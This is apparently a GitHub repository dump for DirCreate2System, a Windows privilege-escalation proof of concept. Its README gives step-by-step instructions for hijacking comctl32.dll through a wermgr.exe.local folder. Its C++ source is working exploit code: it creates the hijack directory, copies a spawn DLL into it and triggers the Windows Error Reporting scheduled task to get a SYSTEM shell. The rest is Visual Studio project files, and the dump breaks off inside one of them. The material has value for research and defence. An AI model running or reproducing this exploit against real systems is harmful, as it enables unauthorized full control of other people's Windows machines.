├── POC1.jpg
├── README.md
├── bin
    ├── dircreate2system.exe
    └── spawn.dll
├── poc.wmv
└── src
    ├── dircreate2system
        ├── dircreate2system.sln
        ├── dircreate2system
        │   ├── dircreate2system.cpp
        │   ├── dircreate2system.vcxproj
        │   ├── dircreate2system.vcxproj.filters
        │   └── dircreate2system.vcxproj.user
        └── x64
        │   └── Release
        │       ├── dircreate2system.exe
        │       ├── dircreate2system.iobj
        │       ├── dircreate2system.ipdb
        │       ├── dircreate2system.pdb
        │       └── spawn.dll
    └── dll_spawn_cmd
        ├── dll_spawn_cmd.sln
        ├── dll_spawn_cmd
            ├── cpp.hint
            ├── dll_spawn_cmd.cpp
            ├── dll_spawn_cmd.h
            ├── dll_spawn_cmd.vcxproj
            ├── dll_spawn_cmd.vcxproj.filters
            ├── dll_spawn_cmd.vcxproj.user
            ├── dllmain.cpp
            ├── framework.h
            ├── pch.cpp
            └── pch.h
        └── x64
            └── Release
                └── spawn.dll


/POC1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/POC1.jpg


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # DirCreate2System
 2 | Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting
 3 | 
 4 | ### Short Description:
 5 | I've discovered **comctl32.dll** (which is missing in system dir which doesn't really exist) has been loaded by wermgr.exe via windows error reporting by running schtasks. It means if we can create a folder name as **C:\windows\system32\wermgr.exe.local** with Full permission ACL, we can hijack the **comctl32.dll** in that folders. Then, I created this poc as a Directory creation to NT AUTHORITY\SYSTEM shell method.
 6 | 
 7 | ### **POC video** 
 8 | [POC.wmv](https://github.com/binderlabs/DirCreate2System/blob/main/poc.wmv) (with backblaze's directory creation bug)
 9 | #### Remark: I've already reported to backblaze and they replied me that it's know issues. So, I made a video poc for educational purpose of this dircreate2system poc.
10 | 
11 | ### For testing purposes: 
12 | (if you have a directory creation bug via service vulnerabilities, you don't need administrator access)
13 | 1. **As an administrator**, create directory `wermgr.exe.local` in `C:\Windows\System32\`
14 | 2. And then, give it access control `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f`
15 | 3. Place `spawn.dll` file and `dircreate2system.exe` in a same directory.
16 | 4. Then, run `dircreate2system.exe`.
17 | 5. Enjoy a shell as NT AUTHORITY\SYSTEM.
18 | 
19 | ![test1](https://github.com/binderlabs/DirCreate2System/blob/main/POC1.jpg)
20 | 
21 | #### *Note:*
22 | *You can also use another methods by viewing this* [dir_create2system.txt](https://github.com/sailay1996/awesome_windows_logical_bugs/blob/master/dir_create2system.txt)
23 | 


--------------------------------------------------------------------------------
/bin/dircreate2system.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/bin/dircreate2system.exe


--------------------------------------------------------------------------------
/bin/spawn.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/bin/spawn.dll


--------------------------------------------------------------------------------
/poc.wmv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/poc.wmv


--------------------------------------------------------------------------------
/src/dircreate2system/dircreate2system.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30907.101
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dircreate2system", "dircreate2system\dircreate2system.vcxproj", "{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Debug|x64.Build.0 = Debug|x64
18 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Debug|x86.Build.0 = Debug|Win32
20 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Release|x64.ActiveCfg = Release|x64
21 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Release|x64.Build.0 = Release|x64
22 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Release|x86.ActiveCfg = Release|Win32
23 | 		{7EE536AE-6C1D-4881-88F7-37C8F2A0CA50}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {4805FB21-F55C-47DF-A2DF-1E3D18DACD86}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/src/dircreate2system/dircreate2system/dircreate2system.cpp:
--------------------------------------------------------------------------------
 1 | // dircreate2system.cpp : This file contains the 'main' function. Program execution begins and ends there.
 2 | //
 3 | 
 4 | #include <Windows.h>
 5 | #include <Shlwapi.h>
 6 | #include <iostream>
 7 | #include <fileapi.h>
 8 | #include <strsafe.h>
 9 | #include <tchar.h>>
10 | #include <Winuser.h> 
11 | #include <wchar.h>
12 | 
13 | 
14 | #pragma comment(lib, "Shlwapi.lib")
15 | 
16 | using namespace std;
17 | 
18 | int main()
19 | {
20 |     LPCWSTR path = (L"C:\\Windows\\System32\\wermgr.exe.local");
21 | 
22 |     if (PathFileExists(path))
23 |     {
24 |         //MessageBox(NULL, L"This file exists", L"File exists", MB_OK);
25 | 		//wprintf(L":\n");
26 | 		wprintf(L"\n[+] Arbitrary Directory Creation to SYSTEM Shell technique !\n");
27 | 		wprintf(L"\n[+] Poc By @404death \n");
28 | 		WIN32_FIND_DATA FindFileData;
29 | 		HANDLE hFind;
30 | 		hFind = FindFirstFile(L"C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6*", &FindFileData);
31 | 		wchar_t BeginPath[MAX_PATH] = L"C:\\Windows\\WinSxS\\";
32 | 		wchar_t CommonControlsFolder[MAX_PATH];
33 | 		wchar_t EndPath[23] = L"\\comctl32.dll";
34 | 		wmemcpy(CommonControlsFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
35 | 		FindClose(hFind);
36 | 		wcscat_s(BeginPath, CommonControlsFolder);
37 | 		wcscat_s(BeginPath, EndPath);
38 | 
39 | 		//CommonControlsFolder
40 | 		//wprintf_s(CommonControlsFolder);
41 | 		wchar_t lpStrsyspath[MAX_PATH] = L"C:\\windows\\system32\\wermgr.exe.local\\"; //cacls C:\\windows\\system32\\wermgr.exe.local /e /g everyone:f
42 | 		wcscat_s(lpStrsyspath, CommonControlsFolder);
43 | 		wprintf(L"\n[+] Finding directory to hijack....\n");
44 | 		Sleep(2000);
45 | 		//wchar_t test = lpStrsyspath;
46 | 		//CreateDirectoryW(lpStrsyspath, NULL);
47 | 		if (!CreateDirectoryW(lpStrsyspath, NULL))
48 | 		{
49 | 			wprintf(L"\nCouldn't create %S directory.\n", lpStrsyspath);
50 | 		}
51 | 		else
52 | 		{
53 | 			wprintf(L"\n[+] directory successfully created.\n", lpStrsyspath);
54 | 		}
55 | 
56 | 		wcscat_s(lpStrsyspath, EndPath);
57 | 		wprintf(L"\n[+] Copying dll file to created directory....\n");
58 | 		Sleep(1000);
59 | 		if (!CopyFileW(L"spawn.dll", lpStrsyspath, true))
60 | 		{
61 | 			wprintf(L"\nCouldn't create %S File.\n", lpStrsyspath);
62 | 		}
63 | 		else
64 | 		{
65 | 			wprintf(L"\n[+] Dll File successfully created.\n", lpStrsyspath);
66 | 			Sleep(1000);
67 | 		}
68 | 		//CopyFileW(L"spawn.dll", lpStrsyspath, true);
69 | 
70 | 		//MessageBox(0, lpStrsyspath, L"path!!!", MB_OK);
71 | 		WinExec("cmd /c SCHTASKS /RUN /TN \"Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\" > nul 2>&1", 0);
72 | 		wprintf(L"\n[+] Spawning SYSTEM shell...\n");
73 | 		return 0;
74 |     }
75 |     else
76 |     {
77 |         MessageBox(NULL, L"[+] Exploitable directory doesn't exist !!!", L"Folder Doesn't exists", MB_OK);
78 |     }
79 |     return 0;
80 | }


--------------------------------------------------------------------------------
/src/dircreate2system/dircreate2system/dircreate2system.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{7ee536ae-6c1d-4881-88f7-37c8f2a0ca50}</ProjectGuid>
 25 |     <RootNamespace>dircreate2system</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="dircreate2system.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------
/src/dircreate2system/dircreate2system/dircreate2system.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="dircreate2system.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/src/dircreate2system/dircreate2system/dircreate2system.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/src/dircreate2system/x64/Release/dircreate2system.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dircreate2system/x64/Release/dircreate2system.exe


--------------------------------------------------------------------------------
/src/dircreate2system/x64/Release/dircreate2system.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dircreate2system/x64/Release/dircreate2system.iobj


--------------------------------------------------------------------------------
/src/dircreate2system/x64/Release/dircreate2system.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dircreate2system/x64/Release/dircreate2system.ipdb


--------------------------------------------------------------------------------
/src/dircreate2system/x64/Release/dircreate2system.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dircreate2system/x64/Release/dircreate2system.pdb


--------------------------------------------------------------------------------
/src/dircreate2system/x64/Release/spawn.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dircreate2system/x64/Release/spawn.dll


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.29709.97
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dll_spawn_cmd", "dll_spawn_cmd\dll_spawn_cmd.vcxproj", "{765C5755-DBE9-4AB5-9427-921D0E46F9F0}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Debug|x64.Build.0 = Debug|x64
18 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Debug|x86.Build.0 = Debug|Win32
20 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Release|x64.ActiveCfg = Release|x64
21 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Release|x64.Build.0 = Release|x64
22 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Release|x86.ActiveCfg = Release|Win32
23 | 		{765C5755-DBE9-4AB5-9427-921D0E46F9F0}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {091663F4-3CF5-4326-9EFD-48F15AEFF9F7}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/cpp.hint:
--------------------------------------------------------------------------------
1 | #define DLLSPAWNCMD_API __declspec(dllexport)
2 | #define DLLSPAWNCMD_API __declspec(dllimport)
3 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dll_spawn_cmd.cpp:
--------------------------------------------------------------------------------
 1 | // dll_spawn_cmd.cpp : Defines the exported functions for the DLL.
 2 | //
 3 | 
 4 | #include "pch.h"
 5 | #include "framework.h"
 6 | #include "dll_spawn_cmd.h"
 7 | 
 8 | 
 9 | // This is an example of an exported variable
10 | DLLSPAWNCMD_API int ndllspawncmd=0;
11 | 
12 | // This is an example of an exported function.
13 | DLLSPAWNCMD_API int fndllspawncmd(void)
14 | {
15 |     return 0;
16 | }
17 | 
18 | // This is the constructor of a class that has been exported.
19 | Cdllspawncmd::Cdllspawncmd()
20 | {
21 |     return;
22 | }
23 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dll_spawn_cmd.h:
--------------------------------------------------------------------------------
 1 | // The following ifdef block is the standard way of creating macros which make exporting
 2 | // from a DLL simpler. All files within this DLL are compiled with the DLLSPAWNCMD_EXPORTS
 3 | // symbol defined on the command line. This symbol should not be defined on any project
 4 | // that uses this DLL. This way any other project whose source files include this file see
 5 | // DLLSPAWNCMD_API functions as being imported from a DLL, whereas this DLL sees symbols
 6 | // defined with this macro as being exported.
 7 | #ifdef DLLSPAWNCMD_EXPORTS
 8 | #define DLLSPAWNCMD_API __declspec(dllexport)
 9 | #else
10 | #define DLLSPAWNCMD_API __declspec(dllimport)
11 | #endif
12 | 
13 | // This class is exported from the dll
14 | class DLLSPAWNCMD_API Cdllspawncmd {
15 | public:
16 | 	Cdllspawncmd(void);
17 | 	// TODO: add your methods here.
18 | };
19 | 
20 | extern DLLSPAWNCMD_API int ndllspawncmd;
21 | 
22 | DLLSPAWNCMD_API int fndllspawncmd(void);
23 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dll_spawn_cmd.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <ProjectGuid>{765C5755-DBE9-4AB5-9427-921D0E46F9F0}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>dllspawncmd</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <TargetName>DLLSPAWNCMD</TargetName>
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 78 |     <TargetName>DLLSPAWNCMD</TargetName>
 79 |     <LinkIncremental>true</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
